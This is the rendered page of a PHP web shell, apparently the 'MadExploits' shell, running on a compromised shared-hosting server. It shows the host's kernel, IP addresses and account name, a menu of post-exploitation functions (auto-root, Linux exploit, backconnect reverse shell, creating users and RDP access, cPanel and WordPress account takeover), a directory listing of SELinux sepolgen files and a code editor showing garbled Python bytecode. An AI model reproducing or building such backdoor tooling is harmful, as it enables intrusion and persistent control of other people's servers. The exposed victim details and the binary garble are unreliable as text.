Linux id-dci-web1412.main-hosting.eu 5.14.0-611.20.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Jan 14 06:35:04 EST 2026 x86_64
LiteSpeed
: 2a02:4780:6:1512:0:19fc:adf1:2 | : 216.73.216.140
Cant Read [ /etc/named.conf ]
8.1.34
u435990001
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
lib /
python3.9 /
site-packages /
sepolgen /
__pycache__ /
[ HOME SHELL ]
Name
Size
Permission
Action
__init__.cpython-39.opt-1.pyc
144
B
-rw-r--r--
__init__.cpython-39.pyc
144
B
-rw-r--r--
access.cpython-39.opt-1.pyc
11.09
KB
-rw-r--r--
access.cpython-39.pyc
11.09
KB
-rw-r--r--
audit.cpython-39.opt-1.pyc
16.86
KB
-rw-r--r--
audit.cpython-39.pyc
16.86
KB
-rw-r--r--
classperms.cpython-39.opt-1.py...
2.41
KB
-rw-r--r--
classperms.cpython-39.pyc
2.41
KB
-rw-r--r--
defaults.cpython-39.opt-1.pyc
2.24
KB
-rw-r--r--
defaults.cpython-39.pyc
2.24
KB
-rw-r--r--
interfaces.cpython-39.opt-1.py...
12.3
KB
-rw-r--r--
interfaces.cpython-39.pyc
12.3
KB
-rw-r--r--
lex.cpython-39.opt-1.pyc
20.88
KB
-rw-r--r--
lex.cpython-39.pyc
20.88
KB
-rw-r--r--
matching.cpython-39.opt-1.pyc
6.02
KB
-rw-r--r--
matching.cpython-39.pyc
6.02
KB
-rw-r--r--
module.cpython-39.opt-1.pyc
7
KB
-rw-r--r--
module.cpython-39.pyc
7
KB
-rw-r--r--
objectmodel.cpython-39.opt-1.p...
3.88
KB
-rw-r--r--
objectmodel.cpython-39.pyc
3.88
KB
-rw-r--r--
output.cpython-39.opt-1.pyc
3.46
KB
-rw-r--r--
output.cpython-39.pyc
3.46
KB
-rw-r--r--
policygen.cpython-39.opt-1.pyc
12.58
KB
-rw-r--r--
policygen.cpython-39.pyc
12.62
KB
-rw-r--r--
refparser.cpython-39.opt-1.pyc
28.57
KB
-rw-r--r--
refparser.cpython-39.pyc
28.57
KB
-rw-r--r--
refpolicy.cpython-39.opt-1.pyc
39.23
KB
-rw-r--r--
refpolicy.cpython-39.pyc
39.23
KB
-rw-r--r--
sepolgeni18n.cpython-39.opt-1....
394
B
-rw-r--r--
sepolgeni18n.cpython-39.pyc
394
B
-rw-r--r--
util.cpython-39.opt-1.pyc
6.21
KB
-rw-r--r--
util.cpython-39.pyc
6.21
KB
-rw-r--r--
yacc.cpython-39.opt-1.pyc
51.89
KB
-rw-r--r--
yacc.cpython-39.pyc
51.96
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : output.cpython-39.opt-1.pyc
a ���h, � @ sp d Z ddlmZ ddlmZ ejr.ddlmZ G dd� d�Zdd� Zd d � Zdd� Z d d� Z dd� Zdd� ZdS )ai Classes and functions for the output of reference policy modules. This module takes a refpolicy.Module object and formats it for output using the ModuleWriter object. By separating the output in this way the other parts of Madison can focus solely on generating policy. This keeps the semantic / syntactic issues cleanly separated from the formatting issues. � )� refpolicy)�util)�cmpc @ s e Zd Zdd� Zdd� ZdS )�ModuleWriterc C s d | _ d | _d| _d| _d S )NT)�fd�module�sort�requires)�self� r �3/usr/lib/python3.9/site-packages/sepolgen/output.py�__init__&